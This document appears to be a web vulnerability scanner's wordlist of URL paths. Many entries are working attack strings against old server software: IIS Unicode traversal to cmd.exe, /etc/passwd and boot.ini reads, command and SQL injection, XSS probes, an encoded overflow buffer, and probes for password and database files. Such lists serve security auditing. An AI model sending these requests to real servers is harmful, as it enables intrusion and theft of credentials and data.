/pbserver/pbserver.dll?OSArch=0&OSType=2&LCID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE&OSVer=%55%8B%EC%90%90%90%90%90%bb%ff%ff%ff%ff%83%eb%8b%53%68%6e%2e%74%78%68%76%6f%72%75%68%20%70%73%72%68%69%72%20%3e%68%2f%63%20%64%90%90&CMVer=%68%65%78%65%20%68%
/pccsmysqladm/incs/dbconnect.inc
/pds/
/perl
/perl/
/perl/-e%20%22system('cat%20/etc/passwd');\%22
/perl/-e%20print%20Hello
/perl/env.pl
/perl/files.pl
/perl/samples/env.pl
/perl/samples/lancgi.pl
/perl/samples/ndslogin.pl
/perl/samples/volscgi.pl
/perl5/
/perl5/files.pl
/perweb.nsf
/pforum/edituser.php?boardid=&agree=1&username=&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
/phone/
/phorum/admin/footer.php?GLOBALS[message]=
/phorum/admin/header.php?GLOBALS[message]=
/phorum/admin/stats.php
/phorum/common.php
/photo_album/
/photoads/
/photoads/cgi-bin/
/photoads/cgi-bin/env.cgi
/php.ini
/php/
/php/mlog.phtml
/php/mylog.phtml?screen=/etc/passwd
/php/php.exe?c:\boot.ini
/php/php.exe?c:\winnt\boot.ini
/php3/
/php4/
/phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/phpBB/phpinfo.php
/phpBB/viewtopic.php?t=17071&highlight=\
/phpBB2/includes/db.php
/phpBB2/viewtopic.php
/phpEventCalendar/file_upload.php
/phpPhotoAlbum/explorer.php
/phpclassifieds/latestwap.php
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/phpimageview.php
/phpinfo.php
/phpinfo.php3
/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=
/phprocketaddin/?page=../../../../../../../../../../boot.ini
/phprocketaddin/?page=../../../../../../../../../../etc/passwd
/phpshare/phpshare.php
/phptonuke.php?filnavn
/phptonuke.php?filnavn=/etc/passwd
/piranha/secure/passwd.php3
/pls/admin
/pls/help/
/pls/portal30/admin_/
/pls/sample/admin_/help/..%255cplsql.conf
/pls/simpledad/admin_/gateway.htm?schema=sample
/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=&message=MESSAGE&submitpm=Submit
/pmlite.php
/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=&mode=0&message=Hello
/porn/
/porno/
/ports/
/postnuke/html/modules.php?op=modload&name=News&file=article&sid=
/pr0n/
/prd.i/pgen/
/private.nsf
/private/
/private/      
/private/.htpasswd
/process_bug.cgi
/profile.php?u=JUNK(8)
/program/
/programming/
/programs/
/project/index.php?m=projects&user_cookie=1
/pron/
/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/pservlet.html
/pub/
/pub/english.cgi?op=rmail
/public.nsf
/public/
/publisher
/publisher               
/publisher/
/purchase/
/purchases/
/pvote/ch_info.php
/pw/
/pw/storemgr.pw
/qpadmin.nsf
/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
/quickplace/quickplace/main.nsf
/quickstart/qstart50.nsf
/quickstart/wwsample.nsf
/quikstore.cfg
/quikstore.cgi
/quote.html?filename=../../../../../../../../../../../../../../../../etc/passwd&path_to_font_file=ariali.ttf
/readme.eml
/readme.nsf
/readmec.nsf
/readmes.nsf
/register/
/registered/
/remote_login.pl
/replymsg.php?send=1&destin=
/reports.nsf
/reports/
/reseller/
/restricted/
/retail/
/reviews/newpro.cgi
/rightfax/fuwww.dll
/robots.txt
/root/
/rooted/
/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/rtm.log
/sales/
/sam
/sam._
/sam.bin
/sample.asp
/sample/faqw46
/sample/framew46
/sample/pagesw46
/sample/siregw46
/sample/site1w4646
/sample/site2w4646
/sample/site3w4646
/samples/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+dir
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/samples/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/samples/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir
/samples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/samples/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir
/samples/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/samples/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir
/samples/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir
/samples/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/samples/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/samples/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/samples/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/samples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/samples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/samples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/samples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/samples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/samples/isapi/srch.htm
/samples/search/queryhit.htm
/samples/search/webhits.exe
/sawmill
/scancfg.cgi
/schema50.nsf
/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/script/..%c0%af../..%c0%af../..%c0%af../win2000/system32/cmd.exe?/c+dir
/script/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir
/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/script/tradecli.dll
/scripts
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir/adsamples/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+dir
/scripts/../../cmd.exe
/scripts/../../cmd.exe
/scripts/CGImail.exe
/scripts/Carello/Carello.dll
/scripts/Carello/add.exe
/scripts/Fpadmcgi.exe
/scripts/Fpadmcgi.exe
/scripts/GW5/GWWEB.EXE
/scripts/IISADMPWD
/scripts/admin.pl
/scripts/bbs.pl%3F+.htr
/scripts/c32web.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe
/scripts/cart32.exe/cart32clientlist
/scripts/cfgwiz.exe
/scripts/cgimail.exe
/scripts/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir?/c%20dir%20C:\
/scripts/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir?/c%20dir%20C:\
/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir?/c%20dir%20C:\
/scripts/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir?/c%20dir%20C:\
/scripts/contents.htm
/scripts/convert.bas
/scripts/convert.bas
/scripts/counter.exe
/scripts/cphost.dll
/scripts/cpshost.dll
/scripts/cpshost.dll
/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
/scripts/dbman/db.cgi
/scripts/dmailweb.exe
/scripts/dnewsweb.exe
/scripts/fpadmcgi.exe
/scripts/fpadmin.htm
/scripts/fpcount.exe
/scripts/fpremadm.exe
/scripts/fpsrvadm.exe
/scripts/gupcgi.exe
/scripts/httpodbc.dll
/scripts/iisadmin
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/default.htm
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/samples
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/issadmin/bdir.htr
/scripts/no-such-file.pl
/scripts/nsiislog.dll
/scripts/perl
/scripts/perl.exe
/scripts/perl?
/scripts/postinfo.asp
/scripts/proxy/w3proxy.dll
/scripts/proxy/w3proxy.dll
/scripts/pu3.pl
/scripts/repost.asp
/scripts/root.exe
/scripts/root.exe?/c+dir
/scripts/root.exe?/c+dir+c:\+/OG
/scripts/run.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/author.idq
/scripts/samples/search/filesize.idq
/scripts/samples/search/filetime.idq
/scripts/samples/search/queryhit.idq
/scripts/samples/search/simple.idq
/scripts/samples/search/webhits.exe
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
/scripts/srchadm/admin.idq
/scripts/submit.cgi
/scripts/tools/ctss.idc
/scripts/tools/dsnform
/scripts/tools/dsnform.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/newdsn.exe
/scripts/upload.asp
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/w3who.dll
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/weblog
/scripts/wsisa.dll/WService=anything?WSMadmin
/se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
/search
/search.dll?search?query=%00&logic=AND
/search.dll?search?query=/&logic=AND
/search.php?mailbox=INBOX&what=x&where=&submit=Search
/search.vts
/search/
/search/SQLQHit.asp
/search/htx/SQLQHit.asp
/search/htx/sqlqhit.asp
/search/sqlqhit.asp
/search97.vts
/search97cgi/s97_cgi
/search97cgi/s97_cgi?action=FilterSearch&filter=
/search97cgi/vtopic
/search?NS-query-pat=../../../../../../../../../../etc/passwd
/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
/secret.nsf
/secret/
/secret/secret/add-user.shmtl
/secret/secret/change-passwd.shtml
/secret/secret/sql_tool.shtml
/secrets/
/secure/
/secure/.htaccess
/secure/.wwwacl
/securecontrolpanel/
/secured/
/sell/
/server-info
/server-info/
/server-status
/server-status/
/server_stats/
/servlet/AdminServlet
/servlet/ContentServer?pagename=
/servlet/Counter
/servlet/DateServlet
/servlet/FingerServlet
/servlet/HelloWorldServlet
/servlet/IsItWorking
/servlet/PrintServlet
/servlet/SearchServlet
/servlet/ServletManager
/servlet/SessionManager
/servlet/SessionServlet
/servlet/SimpleServlet
/servlet/SnoopServlet
/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&
/servlet/allaire.jrun.ssi.SSIFilter
/servlet/com.livesoftware.jrun.plugins.jsp.JSP
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
/servlet/com.newatlanta.servletexec.JSP10Servlet/
/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
/servlet/com.unify.ewave.servletexec.UploadServlet
/servlet/com.unify.servletexec.UploadServlet
/servlet/gwmonitor
/servlet/org.apache.catalina.ContainerServlet/
/servlet/org.apache.catalina.Context/
/servlet/org.apache.catalina.Globals/
/servlet/org.apache.catalina.servlets.WebdavStatus/
/servlet/sq1cdsn
/servlet/sqlcdsn
/servlet/sunexamples.BBoardServlet
/servlet/webacc
/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
/servlet/webacc?User.html=noexist
/servlet/webpub
/servlets/MsgPage?action=badlogin&msg=
/session/admnlogin
/set/
/setpasswd.cgi
/setting/
/setup.exe?&page=list_users&user=P
/setup.nsf
/setup/
/setupweb.nsf
/sex/
/sgdynamo.exe?HTNAME=
/shop/
/shop/database/metacart.mdb
/shopa_sessionlist.asp
/shopadmin.asp
/shopdbtest.asp
/shoponline/fpdb/shop.mdb
/shopper/
/shopping/database/metacart.mdb
/shopping300.mdb
/shopping400.mdb
/shoppingdirectory/midicart.mdb
/showcat.php?catid=
/signon
/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html
/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html
/site/eg/source.asp
/site/iissamples/
/siteminder
/siteminder/smadmin.html
/siteseed/
/siteserver/publishing/viewcode.asp?source=/default.asp
/smbcfg.nsf
/smconf.nsf
/smency.nsf
/smhelp.nsf
/smmsg.nsf
/smquar.nsf
/smsolar.nsf
/smssend.php
/smtime.nsf
/smtp.box
/smtp.nsf
/smtpibwq.nsf
/smtpobwq.nsf
/smtptbls.nsf
/smvlog.nsf
/snmp/
/snort2html.html
/soap/servlet/soaprouter
/soapConfig.xml
/software.nsf
/software/
/soinfo.php?\
/source/
/sources/
/splashAdmin.php
/sql/
/sqlnet.log
/sqlqhit.asp
/src/
/src/read_body.php?mailbox=&passed_id=&startMessage=1&show_more=0
/srchadm
/srchadm
/srchadmin/..%255c%255c..%255c%255c..%255c%255c..%255c%255c..%255c%255c../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/srchadmin/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/srvinst.nsf
/srvnam.htm
/srvstatus.chl+
/ss.cfg
/ss000007.pl?PRODREF=
/ssdefs/
/ssdefs/siteseed.dtd
/sshome/
/ssi/
/ssi/envout.bat
/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
/staff/
/stat.htm
/stat/
/statistic/
/statistics/
/statmail.nsf
/statrep.nsf
/stats
/stats.htm
/stats.html
/stats.txt
/stats/
/status
/status.cgi
/status/
/stauths.nsf
/stautht.nsf
/stconf.nsf
/stconfig.nsf
/stdnaset.nsf
/stdomino.nsf
/stlog.nsf
/store/
/streg.nsf
/stronghold-info
/stronghold-status
/stsrc.nsf
/style/
/styles/
/stylesheet/
/stylesheets/
/submit.php?CONF=anything
/submit.php?subject=&story=&storyext=&op=Preview
/subscribe.pl?test@test.com
/sunshop.index.php?action=storenew&username=
/super_stats/access_logs
/support/
/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/supporter/index.php?t=ticketfiles&id=&lt;script&gt;&lt;/script&gt;
/supporter/index.php?t=tickettime&id=&lt;script&gt;&lt;/script&gt;
/supporter/index.php?t=updateticketlog&id=&lt;script&gt;&lt;/script&gt;
/surf/scwebusers
/survey
/sys/
/syshelp/
/sysimages/
/system/
/tarantella/cgi-bin/ttawebtop.cgi
/tarantella/cgi-bin/ttawebtop.cgi/
/tarantella/cgi-bin/ttawebtop.cgi/?action
/tarantella/cgi-bin/ttawebtop.cgi/?action=
/technote/main.cgi
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/technote/print.cgi
/telephone/
/temp/
/template/
/templates/form_header.php?noticemsg=
/temporary/
/test
/test.ida
/test.idc
/test.idq
/test.idw
/test.nsf
/test.php
/test.php%20
/test.php?
/test.shtml?
/test/
/test/jsp/Language.jsp
/test/jsp/buffer1.jsp
/test/jsp/buffer2.jsp
/test/jsp/buffer3.jsp
/test/jsp/buffer4.jsp
/test/jsp/declaration/IntegerOverflow.jsp
/test/jsp/extends1.jsp
/test/jsp/extends2.jsp
/test/jsp/pageAutoFlush.jsp
/test/jsp/pageDouble.jsp
/test/jsp/pageExtends.jsp
/test/jsp/pageImport2.jsp
/test/jsp/pageInfo.jsp
/test/jsp/pageInvalid.jsp
/test/jsp/pageIsErrorPage.jsp
/test/jsp/pageIsThreadSafe.jsp
/test/jsp/pageSession.jsp
/test/realPath.jsp
/test/test.cgi
/testing/
/ticket.php?id=99999
/tmp/
/today.nsf
/tomcat-docs/index.html
/tool/
/tools/
/tools/newdsn.exe
/trace.axd
/trafficlog/
/tree
/tree/
/tvcs/
/ultraboard.pl
/upd/
/updates/
/upload.asp
/uploadn.asp
/uploadx.asp
/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/usage/
/user.php&op=saveuser
/user.php?op=userinfo&uname=
/user/
/usercp.php?function=avataroptions:
/userinfo.php?uid=1;
/userlog.php
/userreg.nsf
/users.nsf
/users/
/users/scripts/submit.cgi
/ustats/
/vc30/
/vfs/
/vider.php3
/view_source.jsp
/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
/viewtopic.php
/vpuserinfo.nsf
/vti_pvt/administrators.pwd
/vti_pvt/authors.pwd
/vti_pvt/service.pwd
/vti_pvt/users.pwd
/w%73_ftp.ini
/w-agora/
/w3perl/admin
/wa.exe
/warez/
/way-board/way-board.cgi
/way-board/way-board.cgi?db=/etc/passwd%00
/web.nsf
/web/
/web800fo/
/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
/webaccess.htm
/webaccess/access-options.txt
/webadmin.nsf
/webadmin/
/webalizer/
/webboard/
/webcart-lite/
/webcart-lite/config/import.txt
/webcart-lite/orders/import.txt
/webcart/
/webcart/carts/
/webcart/config/
/webcart/config/clients.txt
/webcart/orders/
/webcart/orders/import.txt
/webdata/
/weblog/
/weblogic
/weblogs/
/webmail/
/website/
/webstats/
/webtools/bonsai/ccvsblame.cgi?file=/index.html&root=
/webtools/bonsai/cvsblame.cgi?file=
/webtools/bonsai/cvslog.cgi?file=
/webtools/bonsai/cvslog.cgi?file=*&rev=&root=
/webtools/bonsai/cvsquery.cgi?branch=&file=&date=
/webtools/bonsai/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week
/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD
/webtools/bonsai/showcheckins.cgi?person=
/webuser.nsf
/welcome.nsf
/whatever.htr
/whateverJUNK(4).html
/wikihome/action/conflict.php
/wksinst.nsf
/work/
/ws%5fftp.ini
/ws_%66tp.ini
/ws_f%74p.ini
/ws_ft%70.ini
/ws_ftp%2eini
/ws_ftp.%69ni
/ws_ftp.i%6ei
/ws_ftp.in%69
/ws_ftp.ini
/wstats/
/wusage/
/www-sql/
/www/
/wwwboard/passwd.txt
/wwwboard/wwwboard.cgi
/wwwboard/wwwboard.pl
/wwwjoin/
/wwwlog/
/wwwstats.html
/wwwstats/
/wwwthreads/3tvars.pm
/wwwthreads/w3tvars.pm
/xdk/
/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
/xsql/demo/airport/airport.xsql?xml-stylesheet=none
/xxxxxxx.....xxxxxxxxx/
/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/
/z_user_show.php?method=showuserlink&class=&rollid=admin&x=3da59a9da8825&
/zipfiles/
/~/.asp
/~/.aspx
/~/.aspx?aspxerrorpath=null
/~nobody/etc/passwd
/~root/
/doc/rt/overview-summary.html
/doc/webmin.config.notes
/htdocs/manual
/htdocs/index.html.ca
/htdocs/index.html.cz.iso8859-2
/htdocs/index.html.de
/htdocs/index.html.dk
/htdocs/index.html.ee
/htdocs/index.html.el
/htdocs/index.html.en
/htdocs/index.html.es
/htdocs/index.html.et
/htdocs/index.html.fr
/htdocs/index.html.nl
/htdocs/index.html.nn
/htdocs/index.html.no
/htdocs/index.html.se
/htdocs/index.html.tw
/htdocs/index.html.var
/oem_webstage/cgi-bin/oemapp_cgi
/oem_webstage/oem.conf
/cgi-bin/www_acl
/.mysql_history
//admin/admin.shtml
/admin/database/wwForum.mdb
/admin/system_footer.php
/administrator/gallery/uploadimage.php
/axis-cgi/buffer/command.cgi
/buddies.blt
/buddy.blt
/buddylist.blt
/chat/!nicks.txt
/chat/!pwds.txt
/chat/data/usr
/config.inc
/config.php
/CVS/Entries
/data.sql
/databse.sql
/db.sql
/db/users.dat
/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/exair/howitworks/Code.asp
/ext.ini.%00.txt
/finance.xls
/finances.xls
/foo.php3
/forum/admin/database/wwForum.mdb
/forum/admin/wwforum.mdb
/guestbook/admin.php
/guestbook/admin/o12guest.mdb
/horde/imp/test.php
/horde/test.php
/horde/test.php?mode=phpinfo
/htpasswd
/imp/horde/test.php
/inc/common.load.php
/inc/config.php
/inc/dbase.php
/isapi/count.pl?
/jgb_eng_php3/cfooter.php3
/logicworks.ini
/master.password
/megabook/files/20/setup.db
/news/news.mdb
/ows/restricted%2eshow
/passwdfile
/people.lst
/photo/manage.cgi
/photodata/manage.cgi
/php/index.php
/pwd.db
/readme
/readme.txt
/README.TXT
/securelogin/1,2345,A,00.html
/settings/site.ini
/simplebbs/users/users.php
/spwd
/sqldump.sql
/structure.sql
/support/messages
/texis.exe/?-dump
/texis.exe/?-version
/tiki/
/tiki/tiki-install.php
/tsweb/
/typo3conf/
/typo3conf/database.sql
/typo3conf/localconf.php
/vchat/msg.txt
/vgn/legacy/save
/vgn/license
/vgn/login
/vgn/style
/webmail/horde/test.php
/_pages
/cgi-bin/astrocam.cgi
/cgi-bin/blog/
/cgi-bin/blog/mt-check.cgi
/cgi-bin/blog/mt-load.cgi
/cgi-bin/foxweb.dll
/cgi-bin/foxweb.exe
/cgi-bin/guestbook/passwd
/cgi-bin/html2chtml.cgi
/cgi-bin/html2wml.cgi
/cgi-bin/ImageFolio/admin/admin.cgi
/cgi-bin/mt-static/
/cgi-bin/mt-static/mt-check.cgi
/cgi-bin/mt-static/mt-load.cgi
/cgi-bin/mt/
/cgi-bin/mt/mt-check.cgi
/cgi-bin/mt/mt-load.cgi
/cgi-bin/nimages.php
/cgi-bin/photo/
/cgi-bin/photo/manage.cgi
/cgi-bin/photo/protected/manage.cgi
/cgi-bin/sbcgi/sitebuilder.cgi
/cgi-bin/SGB_DIR/superguestconfig
/cgi-bin/smartsearch.cgi
/cgi-bin/smartsearch/smartsearch.cgi
/photo/
/photodata/
/ows/
/.psql_history
/acceso/
/acciones/
/activex/
/adm/
/Agent/
/Agentes/
/agentes/
/Agents/
/apache/
/applicattion/
/applicattions/
/archivar/
/archives/
/archivo/
/Asp/
/auth/
/ayuda/
/backdoor/
/banca/
/banco/
/bank/
